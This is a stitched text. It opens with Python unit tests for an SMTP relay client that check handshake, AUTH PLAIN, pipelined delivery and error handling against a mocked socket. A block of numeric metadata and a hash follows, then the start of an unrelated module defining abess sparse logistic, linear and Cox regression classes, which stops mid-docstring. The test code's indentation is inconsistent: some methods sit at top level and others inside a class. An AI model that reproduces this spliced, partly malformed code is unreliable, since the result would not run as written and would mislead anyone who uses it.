    self.sock.recv(IsA(int)).AndReturn(b'235 Ok\r\n')
    self.mox.ReplayAll()
    def yield_creds():
        yield 'test@example.com'
        yield 'passwd'
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, credentials=yield_creds, ehlo_as='there')
    client._connect()
    client._handshake()
def test_rset(self):
    """_rset() sends RSET and accepts a 250 reply."""
    self.sock.sendall(b'RSET\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator)
    client._connect()
    client._rset()
def test_handshake_authenticate_badcreds(self):
    """A 535 reply to AUTH raises PermanentRelayError during the handshake."""
    self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 AUTH PLAIN\r\n')
    self.sock.sendall(b'AUTH PLAIN AHRlc3RAZXhhbXBsZS5jb20AcGFzc3dk\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'535 Nope!\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, credentials=('test@example.com', 'passwd'), ehlo_as='there')
    client._connect()
    with self.assertRaises(PermanentRelayError):
        client._handshake()
def test_mailfrom(self):
    """_mailfrom() accepts 250; a 550 reply raises PermanentRelayError."""
    self.sock.sendall(b'MAIL FROM:<sender>\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
    self.sock.sendall(b'MAIL FROM:<sender>\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'550 Not Ok\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator)
    client._connect()
    client._mailfrom('sender')
    with self.assertRaises(PermanentRelayError):
        client._mailfrom('sender')
def test_rcptto(self):
    """_rcptto() sends RCPT TO and accepts a 250 reply."""
    self.sock.sendall(b'RCPT TO:<recipient>\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator)
    client._connect()
    client._rcptto('recipient')
def test_send_message_data(self):
    """Message data is sent with the '.' terminator; a 550 raises PermanentRelayError."""
    env = Envelope('sender@example.com', ['rcpt@example.com'])
    env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
    self.sock.sendall(b'From: sender@example.com\r\n\r\ntest test\r\n.\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
    self.sock.sendall(b'From: sender@example.com\r\n\r\ntest test\r\n.\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'550 Ok\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator)
    client._connect()
    client._send_message_data(env)
    with self.assertRaises(PermanentRelayError):
        client._send_message_data(env)
def test_deliver(self):
    """Full successful delivery; the AsyncResult holds a per-recipient 250 Reply.

    The server advertises 8BITMIME, so the 8-bit byte (\\x81) in the body is
    sent unmodified.
    """
    result = AsyncResult()
    env = Envelope('sender@example.com', ['rcpt@example.com'])
    env.parse(b'From: sender@example.com\r\n\r\ntest test \x81\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 8BITMIME\r\n')
    self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
    self.sock.sendall(b'RCPT TO:<rcpt@example.com>\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
    self.sock.sendall(b'DATA\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'354 Go ahead\r\n')
    self.sock.sendall(b'From: sender@example.com\r\n\r\ntest test \x81\r\n.\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
    client._connect()
    client._ehlo()
    client._deliver(result, env)
    self.assertEqual({'rcpt@example.com': Reply('250', 'Ok')}, result.get_nowait())
def test_deliver_badpipeline(self):
    """Pipelined MAIL FROM failure: data aborted with a lone '.', then RSET; result fails permanently."""
    result = AsyncResult()
    env = Envelope('sender@example.com', ['rcpt@example.com'])
    env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
    # PIPELINING: MAIL/RCPT/DATA are sent in one write, replies read in one batch.
    self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\nRCPT TO:<rcpt@example.com>\r\nDATA\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'550 Not ok\r\n250 Ok\r\n354 Go ahead\r\n')
    self.sock.sendall(b'.\r\nRSET\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'550 Yikes\r\n250 Ok\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
    client._connect()
    client._ehlo()
    client._deliver(result, env)
    with self.assertRaises(PermanentRelayError):
        result.get_nowait()
def test_deliver_baddata(self):
    """A 450 after the message body yields a TransientRelayError and an RSET."""
    result = AsyncResult()
    env = Envelope('sender@example.com', ['rcpt@example.com'])
    env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
    self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\nRCPT TO:<rcpt@example.com>\r\nDATA\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n250 Ok\r\n354 Go ahead\r\n')
    self.sock.sendall(b'From: sender@example.com\r\n\r\ntest test\r\n.\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'450 Yikes\r\n')
    self.sock.sendall(b'RSET\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
    client._connect()
    client._ehlo()
    client._deliver(result, env)
    with self.assertRaises(TransientRelayError):
        result.get_nowait()
def test_deliver_badrcpts(self):
    """Every recipient refused: data aborted with a lone '.', result fails permanently."""
    result = AsyncResult()
    env = Envelope('sender@example.com', ['rcpt@example.com'])
    env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
    self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\nRCPT TO:<rcpt@example.com>\r\nDATA\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n550 Not ok\r\n354 Go ahead\r\n')
    self.sock.sendall(b'.\r\nRSET\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'550 Yikes\r\n250 Ok\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
    client._connect()
    client._ehlo()
    client._deliver(result, env)
    with self.assertRaises(PermanentRelayError):
        result.get_nowait()
def test_deliver_rset_exception(self):
    """ConnectionLost during the cleanup RSET propagates out of _deliver;
    the result has already been failed with a TransientRelayError."""
    result = AsyncResult()
    env = Envelope('sender@example.com', ['rcpt@example.com'])
    env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
    self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\nRCPT TO:<rcpt@example.com>\r\nDATA\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n250 Ok\r\n450 No!\r\n')
    self.sock.sendall(b'RSET\r\n')
    self.sock.recv(IsA(int)).AndRaise(ConnectionLost)
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
    client._connect()
    client._ehlo()
    with self.assertRaises(ConnectionLost):
        client._deliver(result, env)
    with self.assertRaises(TransientRelayError):
        result.get_nowait()
def test_deliver_conversion(self):
    """An 8-bit body is re-encoded via binary_encoder when 8BITMIME is not advertised.

    The base64 payload differs between PY2 and PY3 because encode_base64's
    line handling differs across Python versions.
    """
    result = AsyncResult()
    env = Envelope('sender@example.com', ['rcpt@example.com'])
    env.parse(b'From: sender@example.com\r\n\r\ntest test \x81\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
    self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\nRCPT TO:<rcpt@example.com>\r\nDATA\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n250 Ok\r\n354 Go ahead\r\n')
    if pycompat.PY3:
        self.sock.sendall(b'From: sender@example.com\r\nContent-Transfer-Encoding: base64\r\n\r\ndGVzdCB0ZXN0IIEK\r\n.\r\n')
    else:
        self.sock.sendall(b'From: sender@example.com\r\nContent-Transfer-Encoding: base64\r\n\r\ndGVzdCB0ZXN0IIENCg==\r\n.\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there', binary_encoder=encode_base64)
    client._connect()
    client._ehlo()
    client._deliver(result, env)
    self.assertEqual({'rcpt@example.com': Reply('250', 'Ok')}, result.get_nowait())
def test_deliver_conversion_failure(self):
    """An 8-bit body with no binary_encoder configured: nothing beyond EHLO is
    sent except the cleanup RSET, and the result fails permanently."""
    result = AsyncResult()
    env = Envelope('bsender@example.com', ['rcpt@example.com'])
    env.parse(b'From: sender@example.com\r\n\r\ntest test \x81\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
    self.sock.sendall(b'RSET\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
    client._connect()
    client._ehlo()
    client._deliver(result, env)
    with self.assertRaises(PermanentRelayError):
        result.get_nowait()
    def test_disconnect(self):
        """``_disconnect()`` sends QUIT, reads the goodbye reply, and closes
        the socket.
        """
        self.sock.sendall(b'QUIT\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
        self.sock.close()
        self.mox.ReplayAll()
        client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
        client._connect()
        client._disconnect()
    def test_disconnect_failure(self):
        """A socket error while reading the QUIT reply does not propagate;
        the socket is still closed.
        """
        self.sock.sendall(b'QUIT\r\n')
        self.sock.recv(IsA(int)).AndRaise(socket_error(None, None))
        self.sock.close()
        self.mox.ReplayAll()
        client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
        client._connect()
        # No exception expected despite the recv failure.
        client._disconnect()
    def test_run(self):
        """``_run()`` drains one queued (result, envelope) pair end-to-end:
        banner, EHLO, pipelined MAIL/RCPT/DATA, message data, then QUIT.
        """
        result = AsyncResult()
        env = Envelope('sender@example.com', ['rcpt@example.com'])
        env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
        queue = BlockingDeque()
        queue.append((result, env))
        self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
        self.sock.sendall(b'EHLO there\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
        # MAIL/RCPT/DATA are pipelined in one send because the server
        # advertised PIPELINING above.
        self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\nRCPT TO:<rcpt@example.com>\r\nDATA\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n250 Ok\r\n354 Go ahead\r\n')
        self.sock.sendall(b'From: sender@example.com\r\n\r\ntest test\r\n.\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
        self.sock.sendall(b'QUIT\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
        self.sock.close()
        self.mox.ReplayAll()
        client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there')
        client._run()
        # The per-recipient Reply is surfaced through the AsyncResult.
        self.assertEqual({'rcpt@example.com': Reply('250', 'Ok')}, result.get_nowait())
    def test_run_multiple(self):
        """Two queued envelopes are delivered over a single connection;
        ``idle_timeout=0.0`` makes the client QUIT as soon as the queue
        is empty instead of waiting for more work.
        """
        result1 = AsyncResult()
        result2 = AsyncResult()
        env1 = Envelope('sender1@example.com', ['rcpt1@example.com'])
        env1.parse(b'From: sender1@example.com\r\n\r\ntest test\r\n')
        env2 = Envelope('sender2@example.com', ['rcpt2@example.com'])
        env2.parse(b'From: sender2@example.com\r\n\r\ntest test\r\n')
        queue = BlockingDeque()
        queue.append((result1, env1))
        queue.append((result2, env2))
        self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
        self.sock.sendall(b'EHLO there\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
        # First delivery.
        self.sock.sendall(b'MAIL FROM:<sender1@example.com>\r\nRCPT TO:<rcpt1@example.com>\r\nDATA\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n250 Ok\r\n354 Go ahead\r\n')
        self.sock.sendall(b'From: sender1@example.com\r\n\r\ntest test\r\n.\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
        # Second delivery reuses the same session (no new EHLO).
        self.sock.sendall(b'MAIL FROM:<sender2@example.com>\r\nRCPT TO:<rcpt2@example.com>\r\nDATA\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n250 Ok\r\n354 Go ahead\r\n')
        self.sock.sendall(b'From: sender2@example.com\r\n\r\ntest test\r\n.\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
        self.sock.sendall(b'QUIT\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
        self.sock.close()
        self.mox.ReplayAll()
        client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there', idle_timeout=0.0)
        client._run()
        self.assertEqual({'rcpt1@example.com': Reply('250', 'Ok')}, result1.get_nowait())
        self.assertEqual({'rcpt2@example.com': Reply('250', 'Ok')}, result2.get_nowait())
    def test_run_random_exception(self):
        """An unexpected exception (not an SMTP/socket error) propagates out
        of ``_run()`` AND is stored on the pending delivery result.
        """
        result = AsyncResult()
        env = Envelope('sender@example.com', ['rcpt@example.com'])
        env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
        queue = BlockingDeque()
        queue.append((result, env))
        # Banner read blows up with an arbitrary (non-SMTP) exception.
        self.sock.recv(IsA(int)).AndRaise(ValueError('test error'))
        # The client still attempts a clean QUIT before re-raising.
        self.sock.sendall(b'QUIT\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
        self.sock.close()
        self.mox.ReplayAll()
        client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there')
        with self.assertRaises(ValueError):
            client._run()
        with self.assertRaises(ValueError):
            result.get_nowait()
    def test_run_socket_error(self):
        """A socket error during the session is translated into a
        TransientRelayError on the delivery result; ``_run()`` itself
        returns normally.
        """
        result = AsyncResult()
        env = Envelope('sender@example.com', ['rcpt@example.com'])
        env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
        queue = BlockingDeque()
        queue.append((result, env))
        self.sock.recv(IsA(int)).AndRaise(socket_error(None, None))
        self.sock.sendall(b'QUIT\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
        self.sock.close()
        self.mox.ReplayAll()
        client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there')
        client._run()
        with self.assertRaises(TransientRelayError):
            result.get_nowait()
    def test_run_smtperror(self):
        """An SmtpError during the session is likewise surfaced as a
        TransientRelayError on the delivery result.
        """
        result = AsyncResult()
        env = Envelope('sender@example.com', ['rcpt@example.com'])
        env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
        queue = BlockingDeque()
        queue.append((result, env))
        self.sock.recv(IsA(int)).AndRaise(SmtpError('test error'))
        self.sock.sendall(b'QUIT\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
        self.sock.close()
        self.mox.ReplayAll()
        client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there')
        client._run()
        with self.assertRaises(TransientRelayError):
            result.get_nowait()
    def test_run_timeout(self):
        """A (gevent) Timeout raised mid-session results in a
        TransientRelayError on the delivery result.
        """
        result = AsyncResult()
        env = Envelope('sender@example.com', ['rcpt@example.com'])
        env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
        queue = BlockingDeque()
        queue.append((result, env))
        self.sock.recv(IsA(int)).AndRaise(Timeout(0.0))
        self.sock.sendall(b'QUIT\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
        self.sock.close()
        self.mox.ReplayAll()
        client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there')
        client._run()
        with self.assertRaises(TransientRelayError):
            result.get_nowait()
    def test_run_banner_failure(self):
        """A 5xx greeting banner fails the delivery permanently; the client
        still sends QUIT and closes cleanly.
        """
        result = AsyncResult()
        env = Envelope('sender@example.com', ['rcpt@example.com'])
        env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
        queue = BlockingDeque()
        queue.append((result, env))
        self.sock.recv(IsA(int)).AndReturn(b'520 Not Welcome\r\n')
        self.sock.sendall(b'QUIT\r\n')
        self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
        self.sock.close()
        self.mox.ReplayAll()
        client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there')
        client._run()
        with self.assertRaises(PermanentRelayError):
            result.get_nowait()
    def test_run_nomessages(self):
        """With an empty queue and ``idle_timeout=0``, ``_run()`` returns
        immediately — no socket expectations are recorded, so presumably no
        connection is ever attempted (confirm against SmtpRelayClient._run).
        """
        queue = BlockingDeque()
        self.mox.ReplayAll()
        client = SmtpRelayClient(('addr', 0), queue, idle_timeout=0)
        client._run()
# vim:et:fdm=marker:sts=4:sw=4:ts=4
| 48.266094
| 155
| 0.644896
| 3,195
| 22,492
| 4.455086
| 0.058842
| 0.025151
| 0.056906
| 0.080792
| 0.864971
| 0.832022
| 0.824505
| 0.822608
| 0.818744
| 0.810524
| 0
| 0.023098
| 0.193491
| 22,492
| 465
| 156
| 48.369892
| 0.761577
| 0.001467
| 0
| 0.739437
| 0
| 0.046948
| 0.21815
| 0.069733
| 0
| 0
| 0
| 0
| 0.053991
| 1
| 0.077465
| false
| 0.007042
| 0.032864
| 0.002347
| 0.115023
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d32e48e14fa20636f1e2eeb0021bf0fd948cb4a
| 48,330
|
py
|
Python
|
python/abess/linear.py
|
brtang63/abess
|
7bf2f9d9ec7a1247a2508f2768f4308feb81decd
|
[
"Intel"
] | 5
|
2021-08-01T06:33:48.000Z
|
2021-12-10T07:40:17.000Z
|
python/abess/linear.py
|
Weiniily/abess
|
f0e822455ab5223a34fb643b6aff69f22aa818cd
|
[
"Intel"
] | null | null | null |
python/abess/linear.py
|
Weiniily/abess
|
f0e822455ab5223a34fb643b6aff69f22aa818cd
|
[
"Intel"
] | 1
|
2021-03-06T08:20:26.000Z
|
2021-03-06T08:20:26.000Z
|
from abess.metrics import concordance_index_censored
from .bess_base import bess_base
import numpy as np
import types
def fix_docs(cls):
    """Class decorator: splice the first base class's docstring into *cls*.

    If the class docstring contains the "Examples" section marker, the base
    class's docstring (the shared parameter documentation of ``bess_base``)
    is inserted immediately before that section, so each subclass inherits
    the common parameter docs without duplicating them.

    Returns
    -------
    cls : type
        The same class object, possibly with an augmented ``__doc__``.
    """
    base_doc = cls.__bases__[0].__doc__
    # Guard against missing docstrings: the original unconditionally called
    # cls.__doc__.find(...), which raises AttributeError when a class has no
    # docstring (always the case under ``python -OO``).
    if cls.__doc__ and base_doc:
        index = cls.__doc__.find("Examples\n --------\n")
        if index != -1:
            cls.__doc__ = cls.__doc__[:index] + \
                base_doc + cls.__doc__[index:]
    return cls
@fix_docs
class abessLogistic(bess_base):
    """
    Adaptive Best-Subset Selection (ABESS) algorithm for logistic regression.

    Parameters
    ----------
    splicing_type: {0, 1}, optional
        The type of splicing in `fit()` (in Algorithm.h).
        "0" for decreasing by half, "1" for decreasing by one.
        Default: splicing_type = 0.
    important_search : int, optional
        The size of inactive set during updating active set when splicing.
        It should be a non-negative integer.
        Default: important_search = 128.

    Examples
    --------
    >>> ### Sparsity known
    >>>
    >>> from abess.linear import abessLogistic
    >>> from abess.datasets import make_glm_data
    >>> import numpy as np
    >>> np.random.seed(12345)
    >>> data = make_glm_data(n = 100, p = 50, k = 10, family = 'binomial')
    >>> model = abessLogistic(support_size = [10])
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    >>> ### Sparsity unknown
    >>>
    >>> # path_type="seq",
    >>> # Default: support_size = list(range(0, max(min(p, int(n / (np.log(np.log(n)) * np.log(p)))), 1))).
    >>> model = abessLogistic(path_type = "seq")
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    >>>
    >>> # path_type="pgs",
    >>> # Default: s_min=1, s_max=min(p, int(n / (np.log(np.log(n)) * np.log(p)))), K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
    >>> model = abessLogistic(path_type="pgs")
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    """

    def __init__(self, max_iter=20, exchange_num=5, path_type="seq",
                 is_warm_start=True, support_size=None, alpha=None,
                 s_min=None, s_max=None,
                 ic_type="ebic", ic_coef=1.0, cv=1, is_screening=False,
                 screening_size=None,
                 # NOTE(review): mutable default kept for interface
                 # compatibility; it is only forwarded, never mutated here.
                 always_select=[],
                 primary_model_fit_max_iter=10, primary_model_fit_epsilon=1e-8,
                 approximate_Newton=False,
                 thread=1,
                 sparse_matrix=False,
                 splicing_type=0,
                 important_search=128,
                 ):
        # All configuration is forwarded to bess_base; this class only fixes
        # the algorithm/model/data type for the logistic-regression solver.
        super(abessLogistic, self).__init__(
            algorithm_type="abess", model_type="Logistic", data_type=2,
            path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
            is_warm_start=is_warm_start, support_size=support_size,
            alpha=alpha, s_min=s_min, s_max=s_max,
            ic_type=ic_type, ic_coef=ic_coef, cv=cv,
            is_screening=is_screening, screening_size=screening_size,
            always_select=always_select,
            primary_model_fit_max_iter=primary_model_fit_max_iter,
            primary_model_fit_epsilon=primary_model_fit_epsilon,
            approximate_Newton=approximate_Newton,
            thread=thread,
            sparse_matrix=sparse_matrix,
            splicing_type=splicing_type,
            important_search=important_search
        )

    def predict_proba(self, X):
        """
        Give the probability of each new sample being assigned to class 1.

        Parameters
        ----------
        X : array-like of shape (n_samples, p_features)
            Test data.
        """
        X = self.new_data_check(X)
        intercept_ = np.ones(X.shape[0]) * self.intercept_
        xbeta = X.dot(self.coef_) + intercept_
        # Bug fix: clip the linear predictor (as `score` already does) so
        # np.exp cannot overflow to inf and yield NaN for large |xbeta|.
        xbeta = np.clip(xbeta, -30, 30)
        return np.exp(xbeta) / (1 + np.exp(xbeta))

    def predict(self, X):
        """
        For the logistic model, predict the response class on given data:
        1 when the linear predictor is positive (probability > 0.5),
        otherwise 0.

        Parameters
        ----------
        X : array-like of shape (n_samples, p_features)
            Test data.
        """
        X = self.new_data_check(X)
        intercept_ = np.ones(X.shape[0]) * self.intercept_
        xbeta = X.dot(self.coef_) + intercept_
        y = np.zeros(xbeta.size)
        # xbeta > 0 <=> sigmoid(xbeta) > 0.5
        y[xbeta > 0] = 1
        return y

    def score(self, X, y):
        """
        Give new data, and it returns the entropy function (Bernoulli
        log-likelihood of the predictions).

        Parameters
        ----------
        X : array-like of shape (n_samples, n_features)
            Test data.
        y : array-like of shape (n_samples, n_features), optional
            Test response (real class).
        """
        X, y = self.new_data_check(X, y)
        intercept_ = np.ones(X.shape[0]) * self.intercept_
        xbeta = X.dot(self.coef_) + intercept_
        # Clip to keep exp/log finite for extreme linear predictors.
        xbeta[xbeta > 30] = 30
        xbeta[xbeta < -30] = -30
        pr = np.exp(xbeta) / (1 + np.exp(xbeta))
        return (y * np.log(pr) +
                (np.ones(X.shape[0]) - y) *
                np.log(np.ones(X.shape[0]) - pr)).sum()
@ fix_docs
class abessLm(bess_base):
    """
    Adaptive Best-Subset Selection(ABESS) algorithm for linear regression.

    Parameters
    ----------
    splicing_type: {0, 1}, optional
        The type of splicing in `fit()` (in Algorithm.h).
        "0" for decreasing by half, "1" for decreasing by one.
        Default: splicing_type = 0.
    important_search : int, optional
        The size of inactive set during updating active set when splicing.
        It should be a non-negative integer.
        Default: important_search = 128.

    Examples
    --------
    >>> ### Sparsity known
    >>>
    >>> from abess.linear import abessLm
    >>> from abess.datasets import make_glm_data
    >>> import numpy as np
    >>> np.random.seed(12345)
    >>> data = make_glm_data(n = 100, p = 50, k = 10, family = 'gaussian')
    >>> model = abessLm(support_size = [10])
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    >>> ### Sparsity unknown
    >>>
    >>> # path_type="seq",
    >>> # Default: support_size = list(range(0, max(min(p, int(n / (np.log(np.log(n)) * np.log(p)))), 1))).
    >>> model = abessLm(path_type = "seq")
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    >>>
    >>> # path_type="pgs",
    >>> # Default: s_min=1, s_max=min(p, int(n / (np.log(np.log(n)) * np.log(p)))), K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
    >>> model = abessLm(path_type="pgs")
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    """

    def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
                 ic_type="ebic", ic_coef=1.0, cv=1, is_screening=False, screening_size=None,
                 # NOTE(review): mutable default ([]); only forwarded, never
                 # mutated here, so it is kept for interface compatibility.
                 always_select=[],
                 thread=1, covariance_update=False,
                 sparse_matrix=False,
                 splicing_type=0,
                 important_search=128,
                 # primary_model_fit_max_iter=10, primary_model_fit_epsilon=1e-8, approximate_Newton=False
                 ):
        # Forward everything to bess_base; this subclass fixes the
        # least-squares ("Lm") model and its data type.
        super(abessLm, self).__init__(
            algorithm_type="abess", model_type="Lm", data_type=1, path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
            is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max,
            ic_type=ic_type, ic_coef=ic_coef, cv=cv, is_screening=is_screening, screening_size=screening_size,
            always_select=always_select,
            thread=thread, covariance_update=covariance_update,
            sparse_matrix=sparse_matrix,
            splicing_type=splicing_type,
            important_search=important_search
        )

    def predict(self, X):
        """
        For linear regression problem,
        the predict function returns a numpy array of the prediction of the mean
        on given data.

        Parameters
        ----------
        X : array-like of shape (n_samples, p_features)
            Test data.
        """
        X = self.new_data_check(X)
        intercept_ = np.ones(X.shape[0]) * self.intercept_
        return X.dot(self.coef_) + intercept_

    def score(self, X, y):
        """
        Give new data, and it returns the prediction error.

        Parameters
        ----------
        X : array-like of shape (n_samples, n_features)
            Test data.
        y : array-like of shape (n_samples, n_features), optional
            Test response.
        """
        X, y = self.new_data_check(X, y)
        y_pred = self.predict(X)
        # Negative sum of squared errors: larger score is better.
        return -((y - y_pred)*(y - y_pred)).sum()
@ fix_docs
class abessCox(bess_base):
    """
    Adaptive Best-Subset Selection(ABESS) algorithm for COX proportional hazards model.

    Parameters
    ----------
    splicing_type: {0, 1}, optional
        The type of splicing in `fit()` (in Algorithm.h).
        "0" for decreasing by half, "1" for decreasing by one.
        Default: splicing_type = 0.
    important_search : int, optional
        The size of inactive set during updating active set when splicing.
        It should be a non-negative integer.
        Default: important_search = 128.

    Examples
    --------
    >>> ### Sparsity known
    >>>
    >>> from abess.linear import abessCox
    >>> from abess.datasets import make_glm_data
    >>> import numpy as np
    >>> np.random.seed(12345)
    >>> data = make_glm_data(n = 100, p = 50, k = 10, family = 'cox')
    >>> model = abessCox(support_size = [10])
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    >>> ### Sparsity unknown
    >>>
    >>> # path_type="seq",
    >>> # Default: support_size = list(range(0, max(min(p, int(n / (np.log(np.log(n)) * np.log(p)))), 1))).
    >>> model = abessCox(path_type = "seq")
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    >>>
    >>> # path_type="pgs",
    >>> # Default: s_min=1, s_max=min(p, int(n / (np.log(np.log(n)) * np.log(p)))), K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
